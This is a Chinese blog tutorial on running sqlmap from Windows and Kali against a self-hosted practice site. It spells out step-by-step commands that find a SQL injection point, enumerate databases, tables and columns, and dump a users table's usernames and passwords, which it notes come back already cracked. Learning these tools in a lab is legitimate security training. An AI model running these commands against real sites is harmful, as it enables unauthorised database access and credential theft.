23_windows 使用sqlmap、kali使用sqlmap,SQL注入、sqlmap自动注入

已于 2024-08-05 11:22:12 修改
阅读量267 收藏 2
点赞数 8
分类专栏: 渗透类 文章标签: windows 前端 tomcat https java
于 2024-08-04 08:15:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54591045/article/details/140889152
版权

sqlmap介绍

安装sqlmap

安装python环境

链接:https://pan.baidu.com/s/16QhhYCppSvuUikhKiOHNgg?pwd=9LJY 
提取码:9LJY

 

C:\Users\leyilea> python // 测试python能不能用

>>> exit() // 退出

测试sqlmap是否可用

kali中运行sqlmap(两者不同区别是,win10里是脚本的方式运行,kill里是变成了命令方式运行)

使用sqlmap获取数据

1、测试注入点

windows中:

kali中:自己替换自己搭建的靶场IP地址,注意,地址里要有参数,比如id

┌──(root㉿kali)-[~/桌面]
└─# sqlmap -u 'http://10.211.55.3/news/show.php?id=46' -p id --batch

// --batch  默认确定,用上这个就不用自己每次都手动按确认了

 出现这个说明有注入漏洞

2、获取所有数据库

┌──(root㉿kali)-[~/桌面]
└─# sqlmap -u 'http://10.211.55.3/news/show.php?id=46' -p id --batch  --dbs

 这是获取到的所有数据库,共10个

3、获取所有数据表

获取所有数据表,这个命令执行,所有数据表就太多了,所以我选择获取指定库中的数据表

┌──(root㉿kali)-[~/桌面]
└─# sqlmap -u 'http://10.211.55.3/news/show.php?id=46' -p id --batch  --tables

获取指定库中的数据表

┌──(root㉿kali)-[~/桌面]
└─# sqlmap -u 'http://10.211.55.3/news/show.php?id=46' -p id --batch  -D news --tables
// -D :指定库

 这是获取指定库(news)中的数据表,有8个数据表

4、获取所有字段

获取所有字段名,这个执行也是很久很久

┌──(root㉿kali)-[~/桌面]
└─# sqlmap -u 'http://10.211.55.3/news/show.php?id=46' -p id --batch  --columns

获取指定库(news),指定表(news_users)中的字段名

┌──(root㉿kali)-[~/桌面]
└─# sqlmap -u 'http://10.211.55.3/news/show.php?id=46' -p id --batch  -D news -T news_users --columns
// -T :指定表

 这是获取到指定库(news),指定表(news_users)中的字段名

5、获取所有数据

┌──(root㉿kali)-[~/桌面]
└─# sqlmap -u 'http://10.211.55.3/news/show.php?id=46' -p id --batch  -D news -T news_users -C 'userid,username,password'  --dump
// -T :指定表

结果出来了,会发现这里的哈希值会自动的变成了明文,省得你去自己去找了是吧

举例:跑别的靶场也是如此,记得要加参数(?id=)

 总结:

先看看网页有无注入点,例如:可先手工或直接上工具

sql注入的防御

写在了另一篇文章里

http://t.csdnimg.cn/On36j

Ange 宇
关注
专栏目录
Windows安装及使用sqlmap
墨痕诉清风的博客
10-06 2699
1. 去官网python.org下载python2版本进行安装 2. 设置path环境变量(记得将python27目录下的python.exe重命名为python2.exe,负责与python3冲突导致不可用) 3.将下载的SQLMAP安装包解压到文件夹sqlmap中,并拷贝到 "C:\Python27" 目录下; 4.然后在桌面新建立一个cmd的快捷方式,并命名为“SQLMap”; 5.然后在新建快捷方式上右键“属性”,将“起始位置”修改为 D:\install_softwo...
kali linux里利用SQLmap实现SQL注入
2201_76034619的博客
06-28 6005
安全等级调为low进入SQL Injection(Blind)页面。
Windows主机sqlmap安装及使用
XLbb的博客
05-07 3259
说明:sqlmap需下载python2.7.9版本、在win命令行运行。 1.1python安装: 设置环境变量:python的安装路径和scripts路径添加到电脑主机环境变量 步骤:打开环境变量:【此电脑】--右击属性-高级系统设置--高级-环境变量--admin的用户变量--Path--编辑--添加C:\Python27\Scripts和C:\Python27\--确认关闭 2、下载sqlmap软件文件。 打开sqlmap目录,在sqlmap软件目录下输入cmd进入命令行
SQLMapwindows下的安装、使用及进阶
jhfjdf的博客
09-13 9871
SQLMap简要介绍支持的数据库支持的注入方式其他功能安装SQLMap使用SQLMap的入门判断是否存在注入判断文本中的请求是否存在注入 简要介绍 一个自动化的注入工具。功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过的插件。 支持的数据库 MySQL、Oracle、PostgreSQL、Microsoft SQL Sever、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB。 支持的注入方式 盲注(布尔盲注和时间盲注)、
sqlmapwindows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
Windows下安装sqlmap及应用
汪敏的博客
08-02 1701
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档。
使用sqlmap+burpsuite进行中级sql注入
06-01
sqlmap是一款自动SQL注入工具,它能自动检测和利用SQL注入漏洞,获取数据库信息。BurpSuite则是一个集成化的渗透测试工具,主要用来拦截和修改网络请求,便于安全测试和漏洞发现。 1. **启动Burpsuite**: 在...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
SQL注入漏洞之sqlmap自动注入
XZZbh的博客
09-19 449
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档。
kali linux 下sqlmap注入ACCESS数据库.doc
03-04
Kali Linux 作为一个基于 Debian 的 Linux 发行版,广泛应用于渗透测试和安全评估中,而 SQLmap 则是一个开源的自动化 SQL 注入工具,旨在检测和利用 SQL 注入漏洞。下面我们将详细介绍如何使用 Kali Linux 下的 ...
SQLMAP的下载安装和使用(Windows)
最新发布
weixin_68416970的博客
05-16 2936
SQLMAP 是一款广泛使用的开源 SQL 注入检测和利用工具。本文介绍了SQLMAP的下载安装和基本使用SQLMAP 这样的工具在合法的安全测试和研究环境之外的使用可能是非法的和不道德的。在实际应用中,应该在授权和合法的情况下使用它来帮助发现和修复系统中的安全漏洞,以提高系统的安全性。
Sqlmap使用安装和命令详细教程
2301_77147676的博客
03-22 1385
-auth-type=ATYPE HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM) --auth-cred=ACRED HTTP身份验证凭据(用户名:密码) --auth-cert=ACERT HTTP认证证书(key_file,cert_file) --proxy=PROXY 使用HTTP代理连接到目标URL --proxy-cred=PCRED HTTP代理身份验证凭据(用户名:密码) --ignore-proxy 忽略系统默认的HTTP代理。
分享 2022 年最受欢迎的黑科技工具(一)
tuonioooo
11-28 626
Hello, everybody ,2022 年最受欢迎的黑科技工具(一),收藏一波吧,您的在看、转发、点赞就是对tuonioooo最大的支持!
WindowsSQLMAP的安装图解
zhaoguowei的博客
10-08 715
由于SQLMap是利用Python语言写的,所以需要将Python这个语言环境给安装上,以下是详细安装过程: 准备工作: (1) Windows7/8/10操作系统; (2) Python2.7.11; (3) SQLMap Step1. Python2.7.11下载: 下载地址:https://www.python.org/downloads/ Step2. Python2.7.11安装: ...
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 4178
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
SQL注入测试工具SQLmap使用方法
weixin_45811834的博客
06-15 1699
SQLmap是一个自动SQL注入工具,可以用于检测和利用Web应用程序中的SQL注入漏洞。通过学习和使用SQLmap,我们可以更好地保护我们的Web应用程序免受黑客攻击。在命令提示符中,使用cd命令进入SQLmap所在的目录。这个命令将向Web应用程序发送一个带有注入参数的请求,SQLmap自动检测和利用SQL注入漏洞,并尝试获取数据库名。通过学习和使用SQLmap,我们可以更好地保护我们的Web应用程序免受黑客攻击。在Windows中,按下Win+R,输入cmd并回车,打开命令提示符。
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
热门推荐
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
SQLMAP使用
m0_58001548的博客
04-03 3926
SQLmap 是一款用来检测与利用 SQL 注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。官方网站下载 http://sqlmap.org/
Kali Linux的sqlmap渗透测试工具:自动SQL注入与数据库权限获取
Kali-sql.pptx是一个关于渗透测试工具...Kali-sql.pptx文档深入探讨了SQL注入的原理、工具(sqlmap)的使用以及如何在实际环境中实施安全扫描和渗透测试,这对于从事IT安全工作的人士来说,是一份极其有价值的参考资料。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值